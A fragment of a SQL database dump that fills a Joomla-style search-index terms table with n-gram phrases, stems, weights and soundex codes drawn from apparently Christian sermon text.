(277157, 'tell you the', 'tell you the', 0, 1, 1.4, 'T430', 1, '*'),
(277158, 'than what they', 'than what they', 0, 1, 1.4667, 'T530', 1, '*'),
(277159, 'that a time', 'that a time', 0, 1, 1.3667, 'T500', 1, '*'),
(277160, 'that failed', 'that failed', 0, 1, 1.3667, 'T143', 1, '*'),
(277161, 'that failed god', 'that failed god', 0, 1, 1.5, 'T14323', 1, '*'),
(277162, 'that failed it', 'that failed it', 0, 1, 1.4667, 'T143', 1, '*'),
(277163, 'that fear', 'that fear', 0, 1, 1.3, 'T160', 1, '*'),
(277164, 'that fear adds', 'that fear adds', 0, 1, 1.4667, 'T1632', 1, '*'),
(277165, 'that god gives', 'that god gives', 0, 1, 1.4667, 'T23212', 1, '*'),
(277166, 'that is backing', 'that is backing', 0, 1, 1.5, 'T21252', 1, '*'),
(277167, 'that moment', 'that moment', 0, 1, 1.3667, 'T530', 1, '*'),
(277168, 'that moment handling', 'that moment handling', 0, 1, 1.6667, 'T5353452', 1, '*'),
(277169, 'that the sun', 'that the sun', 0, 1, 1.4, 'T250', 1, '*'),
(277170, 'that was wise', 'that was wise', 0, 1, 1.4333, 'T200', 1, '*'),
(277171, 'that what', 'that what', 0, 1, 1.3, 'T000', 1, '*'),
(277172, 'that what used', 'that what used', 0, 1, 1.4667, 'T230', 1, '*'),
(277173, 'that will go', 'that will go', 0, 1, 1.4, 'T420', 1, '*'),
(277174, 'thatis', 'thati', 0, 0, 0.4, 'T200', 1, '*'),
(277175, 'thatis where', 'thati where', 0, 1, 1.4, 'T260', 1, '*'),
(277176, 'thatis where you', 'thati where you', 0, 1, 1.5333, 'T260', 1, '*'),
(277177, 'the attention', 'the attention', 0, 1, 1.4333, 'T535', 1, '*'),
(277178, 'the attention of', 'the attention of', 0, 1, 1.5333, 'T5351', 1, '*'),
(277179, 'the currency', 'the currency', 0, 1, 1.4, 'T2652', 1, '*'),
(277180, 'the currency of', 'the currency of', 0, 1, 1.5, 'T26521', 1, '*'),
(277181, 'the days that', 'the days that', 0, 1, 1.4333, 'T230', 1, '*'),
(277182, 'the degree', 'the degree', 0, 1, 1.3333, 'T260', 1, '*'),
(277183, 'the degree of', 'the degree of', 0, 1, 1.4333, 'T261', 1, '*'),
(277184, 'the devil it', 'the devil it', 0, 1, 1.4, 'T143', 1, '*'),
(277185, 'the difference between', 'the difference between', 0, 1, 1.7333, 'T1652135', 1, '*'),
(277186, 'the different', 'the different', 0, 1, 1.4333, 'T1653', 1, '*'),
(277187, 'the different situations', 'the different situations', 0, 1, 1.8, 'T16532352', 1, '*'),
(277188, 'the egyptians', 'the egyptians', 0, 1, 1.4333, 'T21352', 1, '*'),
(277189, 'the egyptians were', 'the egyptians were', 0, 1, 1.6, 'T213526', 1, '*'),
(277190, 'the end of', 'the end of', 0, 1, 1.3333, 'T531', 1, '*'),
(277191, 'the evil', 'the evil', 0, 1, 1.2667, 'T140', 1, '*'),
(277192, 'the evil touching', 'the evil touching', 0, 1, 1.5667, 'T143252', 1, '*'),
(277193, 'the force that', 'the force that', 0, 1, 1.4667, 'T1623', 1, '*'),
(277194, 'the israelites', 'the israelites', 0, 1, 1.4667, 'T26432', 1, '*'),
(277195, 'the israelites for', 'the israelites for', 0, 1, 1.6, 'T2643216', 1, '*'),
(277196, 'the israelites were', 'the israelites were', 0, 1, 1.6333, 'T264326', 1, '*'),
(277197, 'the key that', 'the key that', 0, 1, 1.4, 'T230', 1, '*'),
(277198, 'the kingdom at', 'the kingdom at', 0, 1, 1.4667, 'T252353', 1, '*'),
(277199, 'the moon', 'the moon', 0, 1, 1.2667, 'T500', 1, '*'),
(277200, 'the moon give', 'the moon give', 0, 1, 1.4333, 'T521', 1, '*'),
(277201, 'the point of', 'the point of', 0, 1, 1.4, 'T1531', 1, '*'),
(277202, 'the practical', 'the practical', 0, 1, 1.4333, 'T162324', 1, '*'),
(277203, 'the practical side', 'the practical side', 0, 1, 1.6, 'T16232423', 1, '*'),
(277204, 'the prophetic at', 'the prophetic at', 0, 1, 1.5333, 'T161323', 1, '*'),
(277205, 'the prophetic side', 'the prophetic side', 0, 1, 1.6, 'T161323', 1, '*'),
(277206, 'the sun', 'the sun', 0, 1, 1.2333, 'T250', 1, '*'),
(277207, 'the sun shall', 'the sun shall', 0, 1, 1.4333, 'T2524', 1, '*'),
(277208, 'the sun will', 'the sun will', 0, 1, 1.4, 'T254', 1, '*'),
(277209, 'the supernatural experiences', 'the supernatural experiences', 0, 1, 1.9333, 'T216536421652', 1, '*'),
(277210, 'the time he', 'the time he', 0, 1, 1.3667, 'T500', 1, '*'),
(277211, 'the time when', 'the time when', 0, 1, 1.4333, 'T500', 1, '*'),
(277212, 'the two very', 'the two very', 0, 1, 1.4, 'T160', 1, '*'),
(277213, 'thee an', 'thee an', 0, 1, 1.2333, 'T500', 1, '*'),
(277214, 'thee an everlasting', 'thee an everlasting', 0, 1, 1.6333, 'T51642352', 1, '*'),
(277215, 'thee but', 'thee but', 0, 1, 1.2667, 'T130', 2, '*'),
(277216, 'thee but the', 'thee but the', 0, 1, 1.4, 'T130', 1, '*'),
(277217, 'their children', 'their children', 0, 1, 1.4667, 'T624365', 1, '*'),
(277218, 'their children to', 'their children to', 0, 1, 1.5667, 'T6243653', 1, '*'),
(277219, 'their faith that', 'their faith that', 0, 1, 1.5333, 'T613', 1, '*'),
(277220, 'them so', 'them so', 0, 1, 1.2333, 'T520', 1, '*'),
(277221, 'them so any', 'them so any', 0, 1, 1.3667, 'T525', 1, '*'),
(277222, 'there is destruction', 'there is destruction', 0, 1, 1.6667, 'T623236235', 1, '*'),
(277223, 'there was darkness', 'there was darkness', 0, 1, 1.6, 'T6236252', 1, '*'),
(277224, 'these days we', 'these days we', 0, 1, 1.4333, 'T232', 1, '*'),
(277225, 'these two', 'these two', 0, 1, 1.3, 'T230', 1, '*'),
(277226, 'these two sides', 'these two sides', 0, 1, 1.5, 'T23232', 1, '*'),
(277227, 'they actually', 'thei actually', 0, 1, 1.4333, 'T234', 1, '*'),
(277228, 'they actually desire', 'thei actually desire', 0, 1, 1.6667, 'T234326', 1, '*'),
(277229, 'this is talking', 'thi is talking', 0, 1, 1.5, 'T234252', 1, '*'),
(277230, 'this way', 'thi way', 0, 1, 1.2667, 'T200', 1, '*'),
(277231, 'this way your', 'thi way your', 0, 1, 1.4333, 'T260', 1, '*'),
(277232, 'this year the', 'thi year the', 0, 1, 1.4333, 'T263', 1, '*'),
(277233, 'those that will', 'those that will', 0, 1, 1.5, 'T234', 1, '*'),
(277234, 'thy glory', 'thy glory', 0, 1, 1.3, 'T246', 1, '*'),
(277235, 'thy glory do', 'thy glory do', 0, 1, 1.4, 'T2463', 1, '*'),
(277236, 'thy god thy', 'thy god thy', 0, 1, 1.3667, 'T230', 1, '*'),
(277237, 'thy light by', 'thy light by', 0, 1, 1.4, 'T4231', 1, '*'),
(277238, 'time can', 'time can', 0, 1, 1.2667, 'T525', 1, '*'),
(277239, 'time can add', 'time can add', 0, 1, 1.4, 'T5253', 1, '*'),
(277240, 'time god', 'time god', 0, 1, 1.2667, 'T523', 1, '*'),
(277241, 'time god will', 'time god will', 0, 1, 1.4333, 'T5234', 1, '*'),
(277242, 'time he', 'time he', 0, 1, 1.2333, 'T500', 1, '*'),
(277243, 'time he wants', 'time he wants', 0, 1, 1.4333, 'T532', 1, '*'),
(277244, 'time when', 'time when', 0, 1, 1.3, 'T500', 1, '*'),
(277245, 'time when what', 'time when what', 0, 1, 1.4667, 'T530', 1, '*'),
(277246, 'time will come', 'time will come', 0, 1, 1.4667, 'T5425', 2, '*'),
(277247, 'times men', 'time men', 0, 1, 1.3, 'T525', 1, '*'),
(277248, 'times men are', 'time men are', 0, 1, 1.4333, 'T5256', 1, '*'),
(277249, 'to a school', 'to a school', 0, 1, 1.3667, 'T240', 1, '*'),
(277250, 'to declare another', 'to declare another', 0, 1, 1.6, 'T246536', 1, '*'),
(277251, 'to declare your', 'to declare your', 0, 1, 1.5, 'T246', 1, '*'),
(277252, 'to do something', 'to do something', 0, 1, 1.5, 'T25352', 3, '*'),
(277253, 'to draw the', 'to draw the', 0, 1, 1.3667, 'T630', 1, '*'),
(277254, 'to mess', 'to mess', 0, 1, 1.2333, 'T520', 1, '*'),
(277255, 'to mess you', 'to mess you', 0, 1, 1.3667, 'T520', 1, '*'),
(277256, 'to prepare', 'to prepare', 0, 1, 1.3333, 'T1616', 1, '*'),
(277257, 'to prepare another', 'to prepare another', 0, 1, 1.6, 'T1616536', 1, '*'),
(277258, 'to salary', 'to salary', 0, 1, 1.3, 'T246', 1, '*'),
(277259, 'to salary and', 'to salary and', 0, 1, 1.4333, 'T24653', 1, '*'),
(277260, 'to take a', 'to take a', 0, 1, 1.3, 'T200', 1, '*'),
(277261, 'to take along', 'to take along', 0, 1, 1.4333, 'T2452', 1, '*'),
(277262, 'to take heed', 'to take heed', 0, 1, 1.4, 'T230', 1, '*'),
(277263, 'to the israelites', 'to the israelites', 0, 1, 1.5667, 'T26432', 1, '*'),
(277264, 'to the prophetic', 'to the prophetic', 0, 1, 1.5333, 'T16132', 1, '*'),
(277265, 'to work normally', 'to work normally', 0, 1, 1.5333, 'T625654', 1, '*'),
(277266, 'to your cost', 'to your cost', 0, 1, 1.4, 'T623', 1, '*'),
(277267, 'to your time', 'to your time', 0, 1, 1.4, 'T635', 1, '*'),
(277268, 'touching', 'touch', 0, 0, 0.5333, 'T252', 1, '*'),
(277269, 'touching the', 'touch the', 0, 1, 1.4, 'T2523', 1, '*'),
(277270, 'touching the egyptians', 'touch the egyptians', 0, 1, 1.7333, 'T252321352', 1, '*'),
(277271, 'touching them', 'touch them', 0, 1, 1.4333, 'T25235', 1, '*'),
(277272, 'touching them so', 'touch them so', 0, 1, 1.5333, 'T252352', 1, '*'),
(277273, 'try to prepare', 'try to prepare', 0, 1, 1.4667, 'T631616', 1, '*'),
(277274, 'two sides', 'two sides', 0, 1, 1.3, 'T232', 1, '*'),
(277275, 'two sides of', 'two sides of', 0, 1, 1.4, 'T2321', 1, '*'),
(277276, 'two sides the', 'two sides the', 0, 1, 1.4333, 'T2323', 1, '*'),
(277277, 'two very well', 'two very well', 0, 1, 1.4333, 'T164', 1, '*'),
(277278, 'under and', 'under and', 0, 1, 1.3, 'U53653', 1, '*'),
(277279, 'under and some', 'under and some', 0, 1, 1.4667, 'U5365325', 1, '*'),
(277280, 'under but', 'under but', 0, 1, 1.3, 'U53613', 1, '*'),
(277281, 'under but you', 'under but you', 0, 1, 1.4333, 'U53613', 1, '*'),
(277282, 'unto thee', 'unto thee', 0, 1, 1.3, 'U530', 1, '*'),
(277283, 'unto thee an', 'unto thee an', 0, 1, 1.4, 'U535', 1, '*'),
(277284, 'unto thee but', 'unto thee but', 0, 1, 1.4333, 'U5313', 1, '*'),
(277285, 'up bad', 'up bad', 0, 1, 1.2, 'U130', 1, '*'),
(277286, 'up bad don\'t', 'up bad don', 0, 1, 1.4, 'U1353', 1, '*'),
(277287, 'up god', 'up god', 0, 1, 1.2, 'U123', 1, '*'),
(277288, 'up god will', 'up god will', 0, 1, 1.3667, 'U1234', 1, '*'),
(277289, 'us for the', 'us for the', 0, 1, 1.3333, 'U2163', 1, '*'),
(277290, 'us to know', 'us to know', 0, 1, 1.3333, 'U2325', 1, '*'),
(277291, 'used to salary', 'us to salary', 0, 1, 1.4667, 'U23246', 1, '*'),
(277292, 'used to work', 'us to work', 0, 1, 1.4, 'U2362', 1, '*'),
(277293, 'usual', 'usual', 0, 0, 0.3333, 'U240', 1, '*'),
(277294, 'usual can\'t', 'usual can', 0, 1, 1.3667, 'U24253', 1, '*'),
(277295, 'usual can\'t face', 'usual can face', 0, 1, 1.5333, 'U2425312', 1, '*'),
(277296, 'very well in', 'veri well in', 0, 1, 1.4, 'V645', 1, '*'),
(277297, 'wants to begin', 'want to begin', 0, 1, 1.4667, 'W5323125', 1, '*'),
(277298, 'was darkness', 'wa darkness', 0, 1, 1.4, 'W236252', 1, '*'),
(277299, 'was darkness in', 'wa darkness in', 0, 1, 1.5, 'W2362525', 1, '*'),
(277300, 'was their', 'wa their', 0, 1, 1.3, 'W236', 1, '*'),
(277301, 'was their faith', 'wa their faith', 0, 1, 1.5, 'W23613', 1, '*'),
(277302, 'was wise', 'wa wise', 0, 1, 1.2667, 'W200', 1, '*'),
(277303, 'was wise would', 'wa wise would', 0, 1, 1.4667, 'W243', 1, '*'),
(277304, 'way of faith', 'wai of faith', 0, 1, 1.4, 'W130', 1, '*'),
(277305, 'way your', 'wai your', 0, 1, 1.2667, 'W600', 1, '*'),
(277306, 'way your sun', 'wai your sun', 0, 1, 1.4, 'W625', 1, '*'),
(277307, 'we are stepping', 'we are stepping', 0, 1, 1.5, 'W623152', 1, '*'),
(277308, 'we entering', 'we entering', 0, 1, 1.3667, 'W53652', 1, '*'),
(277309, 'we entering into', 'we entering into', 0, 1, 1.5333, 'W5365253', 1, '*'),
(277310, 'well in these', 'well in these', 0, 1, 1.4333, 'W4532', 1, '*'),
(277311, 'were in egypt', 'were in egypt', 0, 1, 1.4333, 'W65213', 1, '*'),
(277312, 'were not', 'were not', 0, 1, 1.2667, 'W653', 1, '*'),
(277313, 'were not touching', 'were not touching', 0, 1, 1.5667, 'W653252', 1, '*'),
(277314, 'what can your', 'what can your', 0, 1, 1.4333, 'W3256', 1, '*'),
(277315, 'what is delaying', 'what is delaying', 0, 1, 1.5333, 'W323452', 1, '*'),
(277316, 'what is normal', 'what is normal', 0, 1, 1.4667, 'W325654', 1, '*'),
(277317, 'what they actually', 'what they actually', 0, 1, 1.6, 'W3234', 1, '*'),
(277318, 'what used', 'what used', 0, 1, 1.3, 'W323', 1, '*'),
(277319, 'what used to', 'what used to', 0, 1, 1.4, 'W323', 1, '*'),
(277320, 'what you can', 'what you can', 0, 1, 1.4, 'W325', 1, '*'),
(277321, 'whatever god gives', 'whatev god gives', 0, 1, 1.6, 'W31623212', 1, '*'),
(277322, 'when are', 'when are', 0, 1, 1.2667, 'W560', 1, '*'),
(277323, 'when are you', 'when are you', 0, 1, 1.4, 'W560', 1, '*'),
(277324, 'when christians', 'when christians', 0, 1, 1.5, 'W5262352', 1, '*'),
(277325, 'when christians fail', 'when christians fail', 0, 1, 1.6667, 'W526235214', 1, '*'),
(277326, 'when the israelites', 'when the israelites', 0, 1, 1.6333, 'W5326432', 1, '*'),
(277327, 'when what', 'when what', 0, 1, 1.3, 'W530', 1, '*'),
(277328, 'when what is', 'when what is', 0, 1, 1.4, 'W532', 1, '*'),
(277329, 'where you will', 'where you will', 0, 1, 1.4667, 'W640', 1, '*'),
(277330, 'will come that', 'will come that', 0, 1, 1.4667, 'W4253', 1, '*'),
(277331, 'will do your', 'will do your', 0, 1, 1.4, 'W436', 1, '*'),
(277332, 'will find', 'will find', 0, 1, 1.3, 'W4153', 1, '*'),
(277333, 'will find god', 'will find god', 0, 1, 1.4333, 'W415323', 1, '*'),
(277334, 'will go over', 'will go over', 0, 1, 1.4, 'W4216', 1, '*'),
(277335, 'will go under', 'will go under', 0, 1, 1.4333, 'W42536', 1, '*'),
(277336, 'will help us', 'will help us', 0, 1, 1.4, 'W412', 1, '*'),
(277337, 'will no', 'will no', 0, 1, 1.2333, 'W450', 1, '*'),
(277338, 'will no longer', 'will no longer', 0, 1, 1.4667, 'W454526', 1, '*'),
(277339, 'will no more', 'will no more', 0, 1, 1.4, 'W456', 1, '*'),
(277340, 'will only meet', 'will only meet', 0, 1, 1.4667, 'W45453', 1, '*'),
(277341, 'will take it', 'will take it', 0, 1, 1.4, 'W4323', 1, '*'),
(277342, 'will you keep', 'will you keep', 0, 1, 1.4333, 'W421', 1, '*'),
(277343, 'wise would', 'wise would', 0, 1, 1.3333, 'W243', 1, '*'),
(277344, 'wise would come', 'wise would come', 0, 1, 1.5, 'W24325', 1, '*'),
(277345, 'with now', 'with now', 0, 1, 1.2667, 'W350', 1, '*'),
(277346, 'with now your', 'with now your', 0, 1, 1.4333, 'W356', 1, '*'),
(277347, 'won\'t go', 'won go', 0, 1, 1.2667, 'W532', 1, '*'),
(277348, 'won\'t go down', 'won go down', 0, 1, 1.4333, 'W53235', 1, '*'),
(277349, 'work but', 'work but', 0, 1, 1.2667, 'W6213', 1, '*'),
(277350, 'work but what', 'work but what', 0, 1, 1.4333, 'W6213', 1, '*'),
(277351, 'work normally', 'work normally', 0, 1, 1.4333, 'W625654', 1, '*'),
(277352, 'work normally will', 'work normally will', 0, 1, 1.6, 'W625654', 1, '*'),
(277353, 'work the', 'work the', 0, 1, 1.2667, 'W623', 1, '*'),
(277354, 'work the two', 'work the two', 0, 1, 1.4, 'W623', 1, '*'),
(277355, 'work this', 'work this', 0, 1, 1.3, 'W6232', 1, '*'),
(277356, 'work this is', 'work this is', 0, 1, 1.4, 'W6232', 1, '*'),
(277357, 'world to his', 'world to his', 0, 1, 1.4, 'W6432', 1, '*'),
(277358, 'would come', 'would come', 0, 1, 1.3333, 'W4325', 1, '*'),
(277359, 'would come to', 'would come to', 0, 1, 1.4333, 'W43253', 1, '*'),
(277360, 'year the', 'year the', 0, 1, 1.2667, 'Y630', 1, '*'),
(277361, 'year the way', 'year the way', 0, 1, 1.4, 'Y630', 1, '*'),
(277362, 'you an opportunity', 'you an opportunity', 0, 1, 1.6, 'Y516353', 1, '*'),
(277363, 'you are facing', 'you are facing', 0, 1, 1.4667, 'Y61252', 1, '*'),
(277364, 'you are used', 'you are used', 0, 1, 1.4, 'Y623', 1, '*'),
(277365, 'you at the', 'you at the', 0, 1, 1.3333, 'Y300', 1, '*'),
(277366, 'you can deal', 'you can deal', 0, 1, 1.4, 'Y2534', 1, '*'),
(277367, 'you can only', 'you can only', 0, 1, 1.4, 'Y254', 1, '*'),
(277368, 'you cannot take', 'you cannot take', 0, 1, 1.5, 'Y2532', 1, '*'),
(277369, 'you don\'t take', 'you don take', 0, 1, 1.4667, 'Y3532', 1, '*'),
(277370, 'you going', 'you going', 0, 1, 1.3, 'Y252', 1, '*'),
(277371, 'you going to', 'you going to', 0, 1, 1.4, 'Y2523', 1, '*'),
(277372, 'you have fear', 'you have fear', 0, 1, 1.4333, 'Y160', 1, '*'),
(277373, 'you have what', 'you have what', 0, 1, 1.4333, 'Y130', 1, '*'),
(277374, 'you is not', 'you is not', 0, 1, 1.3333, 'Y253', 1, '*'),
(277375, 'you just one', 'you just one', 0, 1, 1.4, 'Y235', 1, '*'),
(277376, 'you keep postponing', 'you keep postponing', 0, 1, 1.6333, 'Y2123152', 1, '*'),
(277377, 'you know what', 'you know what', 0, 1, 1.4333, 'Y253', 1, '*'),
(277378, 'you must work', 'you must work', 0, 1, 1.4333, 'Y52362', 1, '*'),
(277379, 'you take it', 'you take it', 0, 1, 1.3667, 'Y323', 1, '*'),
(277380, 'you take this', 'you take this', 0, 1, 1.4333, 'Y3232', 1, '*'),
(277381, 'you the key', 'you the key', 0, 1, 1.3667, 'Y320', 1, '*'),
(277382, 'you up', 'you up', 0, 1, 1.2, 'Y100', 1, '*'),
(277383, 'you up bad', 'you up bad', 0, 1, 1.3333, 'Y130', 1, '*'),
(277384, 'you will find', 'you will find', 0, 1, 1.4333, 'Y4153', 1, '*'),
(277385, 'you will go', 'you will go', 0, 1, 1.3667, 'Y420', 2, '*'),
(277386, 'you will take', 'you will take', 0, 1, 1.4333, 'Y432', 1, '*'),
(277387, 'you you will', 'you you will', 0, 1, 1.4, 'Y400', 1, '*'),
(277388, 'your cost', 'your cost', 0, 1, 1.3, 'Y623', 1, '*'),
(277389, 'your cost many', 'your cost many', 0, 1, 1.4667, 'Y6235', 1, '*'),
(277390, 'your faith determines', 'your faith determines', 0, 1, 1.7, 'Y613652', 1, '*'),
(277391, 'your faith faith', 'your faith faith', 0, 1, 1.5333, 'Y61313', 1, '*'),
(277392, 'your faith i', 'your faith i', 0, 1, 1.4, 'Y613', 1, '*'),
(277393, 'your faith knows', 'your faith knows', 0, 1, 1.5333, 'Y613252', 1, '*'),
(277394, 'your faith most', 'your faith most', 0, 1, 1.5, 'Y613523', 1, '*'),
(277395, 'your faith take', 'your faith take', 0, 1, 1.5, 'Y6132', 1, '*'),
(277396, 'your light', 'your light', 0, 1, 1.3333, 'Y6423', 1, '*'),
(277397, 'your light by', 'your light by', 0, 1, 1.4333, 'Y64231', 1, '*'),
(277398, 'your natural', 'your natural', 0, 1, 1.4, 'Y65364', 1, '*'),
(277399, 'your natural work', 'your natural work', 0, 1, 1.5667, 'Y6536462', 1, '*'),
(277400, 'your own faith', 'your own faith', 0, 1, 1.4667, 'Y6513', 1, '*'),
(277401, 'your sun', 'your sun', 0, 1, 1.2667, 'Y625', 1, '*'),
(277402, 'your sun won\'t', 'your sun won', 0, 1, 1.4667, 'Y6253', 1, '*'),
(277403, 'your time can', 'your time can', 0, 1, 1.4333, 'Y63525', 1, '*'),
(277404, 'yourown', 'yourown', 0, 0, 0.4667, 'Y650', 1, '*'),
(277405, 'yourown faith', 'yourown faith', 0, 1, 1.4333, 'Y6513', 1, '*'),
(277406, 'yourown faith your', 'yourown faith your', 0, 1, 1.6, 'Y65136', 1, '*'),
(277407, 'zone and', 'zone and', 0, 1, 1.2667, 'Z530', 1, '*'),
(277408, 'zone and it', 'zone and it', 0, 1, 1.3667, 'Z530', 1, '*'),
(277571, '1 corinthians 13', '1 corinthians 13', 0, 1, 1.5333, 'C65352', 1, '*'),
(277572, '1-2 now', '1-2 now', 0, 1, 1.2333, 'N000', 1, '*'),
(277573, '1-2 now that', '1-2 now that', 0, 1, 1.4, 'N300', 1, '*'),
(277574, '1-8', '1-8', 0, 0, 0.3, '', 1, '*'),
(277575, '1-8 as', '1-8 as', 0, 1, 1.2, 'A200', 1, '*'),
(277576, '1-8 as a', '1-8 as a', 0, 1, 1.2667, 'A200', 1, '*'),
(277577, '10 40-42', '10 40-42', 0, 1, 1.2667, '', 1, '*'),
(277578, '10 40-42 jesus', '10 40-42 jesus', 0, 1, 1.4667, 'J000', 1, '*'),
(277579, '12 1', '12 1', 0, 1, 1.1333, '', 1, '*'),
(277580, '12 1 corinthians', '12 1 corinthians', 0, 1, 1.5333, 'C65352', 1, '*'),
(277581, '12 1-2 now', '12 1-2 now', 0, 1, 1.3333, 'N000', 1, '*'),
(277582, '12 3', '12 3', 0, 1, 1.1333, '', 1, '*'),
(277583, '12 3 this', '12 3 this', 0, 1, 1.3, 'T200', 1, '*'),
(277584, '12 36-37', '12 36-37', 0, 1, 1.2667, '', 1, '*'),
(277585, '12 36-37 the', '12 36-37 the', 0, 1, 1.4, 'T000', 1, '*'),
(277586, '13 1-8', '13 1-8', 0, 1, 1.2, '', 1, '*'),
(277587, '13 1-8 as', '13 1-8 as', 0, 1, 1.3, 'A200', 1, '*'),
(277588, '15 12', '15 12', 0, 1, 1.1667, '', 1, '*'),
(277589, '15 12 1', '15 12 1', 0, 1, 1.2333, '', 1, '*'),
(277590, '15 7-9', '15 7-9', 0, 1, 1.2, '', 1, '*'),
(277591, '15 7-9 when', '15 7-9 when', 0, 1, 1.3667, 'W500', 1, '*'),
(277592, '23 7', '23 7', 0, 1, 1.1333, '', 1, '*'),
(277593, '23 7 philippians', '23 7 philippians', 0, 1, 1.5333, 'P4152', 1, '*'),
(277594, '24 correct', '24 correct', 0, 1, 1.3333, 'C623', 1, '*'),
(277595, '24 correct christian', '24 correct christian', 0, 1, 1.6667, 'C62326235', 1, '*'),
(277596, '3 this', '3 this', 0, 1, 1.2, 'T200', 1, '*'),
(277597, '3 this means', '3 this means', 0, 1, 1.4, 'T252', 1, '*'),
(277598, '3-6 ii', '3-6 ii', 0, 1, 1.2, 'I000', 1, '*'),
(277599, '3-6 ii your', '3-6 ii your', 0, 1, 1.3667, 'I600', 1, '*'),
(277600, '36-37', '36-37', 0, 0, 0.5, '', 1, '*'),
(277601, '36-37 the', '36-37 the', 0, 1, 1.3, 'T000', 1, '*'),
(277602, '36-37 the next', '36-37 the next', 0, 1, 1.4667, 'T523', 1, '*'),
(277603, '4 7 above', '4 7 above', 0, 1, 1.3, 'A100', 1, '*'),
(277604, '4 7 it\'s', '4 7 it', 0, 1, 1.2667, 'I320', 1, '*'),
(277605, '4 8-9', '4 8-9', 0, 1, 1.1667, '', 1, '*'),
(277606, '4 8-9 james', '4 8-9 james', 0, 1, 1.3667, 'J520', 1, '*'),
(277607, '40-42', '40-42', 0, 0, 0.5, '', 1, '*'),
(277608, '40-42 jesus', '40-42 jesus', 0, 1, 1.3667, 'J000', 1, '*'),
(277609, '40-42 jesus came', '40-42 jesus came', 0, 1, 1.5333, 'J500', 1, '*'),
(277610, '7 above', '7 above', 0, 1, 1.2333, 'A100', 1, '*'),
(277611, '7 above is', '7 above is', 0, 1, 1.3333, 'A120', 1, '*'),
(277612, '7 it\'s', '7 it', 0, 1, 1.2, 'I320', 1, '*'),
(277613, '7 it\'s pretty', '7 it pretty', 0, 1, 1.4333, 'I32163', 1, '*'),
(277614, '7 philippians', '7 philippians', 0, 1, 1.4333, 'P4152', 1, '*'),
(277615, '7 philippians 4', '7 philippians 4', 0, 1, 1.5, 'P4152', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(277616, '7-9 when', '7-9 when', 0, 1, 1.2667, 'W500', 1, '*'),
(277617, '7-9 when god', '7-9 when god', 0, 1, 1.4, 'W523', 1, '*'),
(277618, '8 3-6', '8 3-6', 0, 1, 1.1667, '', 1, '*'),
(277619, '8 3-6 ii', '8 3-6 ii', 0, 1, 1.2667, 'I000', 1, '*'),
(277620, '8-9 james', '8-9 james', 0, 1, 1.3, 'J520', 1, '*'),
(277621, '8-9 james 4', '8-9 james 4', 0, 1, 1.3667, 'J520', 1, '*'),
(277622, 'a acting', 'a acting', 0, 1, 1.2667, 'A2352', 1, '*'),
(277623, 'a acting like', 'a acting like', 0, 1, 1.4333, 'A235242', 1, '*'),
(277624, 'a certain way', 'a certain way', 0, 1, 1.4333, 'A2635', 1, '*'),
(277625, 'a christian although', 'a christian although', 0, 1, 1.6667, 'A26235432', 1, '*'),
(277626, 'a christian before', 'a christian before', 0, 1, 1.6, 'A2623516', 1, '*'),
(277627, 'a christian man', 'a christian man', 0, 1, 1.5, 'A26235', 1, '*'),
(277628, 'a christian romans', 'a christian romans', 0, 1, 1.6, 'A26235652', 1, '*'),
(277629, 'a christian we', 'a christian we', 0, 1, 1.4667, 'A26235', 1, '*'),
(277630, 'a christian you', 'a christian you', 0, 1, 1.5, 'A26235', 1, '*'),
(277631, 'a christian you\'re', 'a christian you', 0, 1, 1.6, 'A262356', 1, '*'),
(277632, 'a christian your', 'a christian your', 0, 1, 1.5333, 'A262356', 1, '*'),
(277633, 'a daunting', 'a daunting', 0, 1, 1.3333, 'A35352', 1, '*'),
(277634, 'a daunting exercise', 'a daunting exercise', 0, 1, 1.6333, 'A3535262', 1, '*'),
(277635, 'a fellow', 'a fellow', 0, 1, 1.2667, 'A140', 1, '*'),
(277636, 'a fellow man', 'a fellow man', 0, 1, 1.4, 'A145', 1, '*'),
(277637, 'a legal', 'a legal', 0, 1, 1.2333, 'A424', 1, '*'),
(277638, 'a legal foothold', 'a legal foothold', 0, 1, 1.5333, 'A4241343', 1, '*'),
(277639, 'a personal relationship', 'a personal relationship', 0, 1, 1.7667, 'A16254643521', 1, '*'),
(277640, 'a reflection', 'a reflection', 0, 1, 1.4, 'A614235', 1, '*'),
(277641, 'a reflection of', 'a reflection of', 0, 1, 1.5, 'A6142351', 1, '*'),
(277642, 'a regular', 'a regular', 0, 1, 1.3, 'A6246', 1, '*'),
(277643, 'a regular basis', 'a regular basis', 0, 1, 1.5, 'A624612', 1, '*'),
(277644, 'a selfless', 'a selfless', 0, 1, 1.3333, 'A24142', 1, '*'),
(277645, 'a selfless love', 'a selfless love', 0, 1, 1.5, 'A2414241', 1, '*'),
(277646, 'a situation', 'a situation', 0, 1, 1.3667, 'A235', 1, '*'),
(277647, 'a situation in', 'a situation in', 0, 1, 1.4667, 'A235', 1, '*'),
(277648, 'a successful', 'a successful', 0, 1, 1.4, 'A214', 1, '*'),
(277649, 'a successful christian', 'a successful christian', 0, 1, 1.7333, 'A21426235', 1, '*'),
(277650, 'a tight', 'a tight', 0, 1, 1.2333, 'A323', 1, '*'),
(277651, 'a tight or', 'a tight or', 0, 1, 1.3333, 'A3236', 1, '*'),
(277652, 'a tool for', 'a tool for', 0, 1, 1.3333, 'A3416', 1, '*'),
(277653, 'a way god', 'a way god', 0, 1, 1.3, 'A230', 1, '*'),
(277654, 'able to call', 'abl to call', 0, 1, 1.4, 'A14324', 1, '*'),
(277655, 'able to tell', 'abl to tell', 0, 1, 1.4, 'A1434', 1, '*'),
(277656, 'about god\'s', 'about god', 0, 1, 1.3667, 'A13232', 1, '*'),
(277657, 'about god\'s obsession', 'about god obsession', 0, 1, 1.7, 'A13232125', 1, '*'),
(277658, 'about people', 'about people', 0, 1, 1.4, 'A1314', 1, '*'),
(277659, 'about people is', 'about people is', 0, 1, 1.5, 'A13142', 1, '*'),
(277660, 'about talking', 'about talking', 0, 1, 1.4333, 'A134252', 1, '*'),
(277661, 'about talking like', 'about talking like', 0, 1, 1.6, 'A13425242', 1, '*'),
(277662, 'above is', 'abov is', 0, 1, 1.2667, 'A120', 1, '*'),
(277663, 'above is to', 'abov is to', 0, 1, 1.3667, 'A123', 1, '*'),
(277664, 'above scripture “not', 'abov scripture “not', 0, 1, 1.6667, 'A12613653', 1, '*'),
(277665, 'above those', 'abov those', 0, 1, 1.3667, 'A132', 1, '*'),
(277666, 'above those who', 'abov those who', 0, 1, 1.5, 'A132', 1, '*'),
